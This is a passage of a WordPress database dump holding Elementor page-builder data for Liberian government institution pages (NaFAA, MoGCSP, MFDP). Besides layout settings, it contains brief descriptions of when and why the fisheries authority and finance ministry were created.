:{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"nafaa\\\",\\\"tag_id\\\":\\\"65\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"nafaa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27562,4001,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27563,4001,'_thumbnail_id','3221'),(27564,1588,'internet','https://nafaa.gov.lr/'),(27565,1588,'_pods_institution_logo','a:1:{i:0;i:4000;}'),(27566,1588,'institution_logo','4000'),(27567,2704,'_last_editor_used_jetpack','classic-editor'),(27568,1584,'_last_editor_used_jetpack','classic-editor'),(27569,4002,'_elementor_edit_mode','builder'),(27570,4002,'_elementor_template_type','wp-post'),(27571,4002,'_elementor_version','2.7.5'),(27572,4002,'_wp_page_template','default'),(27573,4002,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a4db5a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"38bc81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"17482a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ae03a19\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mogcsp\\\",\\\"tag_id\\\":\\\"64\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mogcsp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7758e3b1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"766d660a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a4a49d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a94bfb8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mogcsp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27574,4002,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27575,4002,'_thumbnail_id','3210'),(27576,4003,'_elementor_edit_mode','builder'),(27577,4003,'_elementor_template_type','wp-post'),(27578,4003,'_elementor_version','2.7.5'),(27579,4003,'_wp_page_template','default'),(27580,4003,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.<\\/p><p>As custodian of the country\\u2019s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mfdp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27581,4003,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i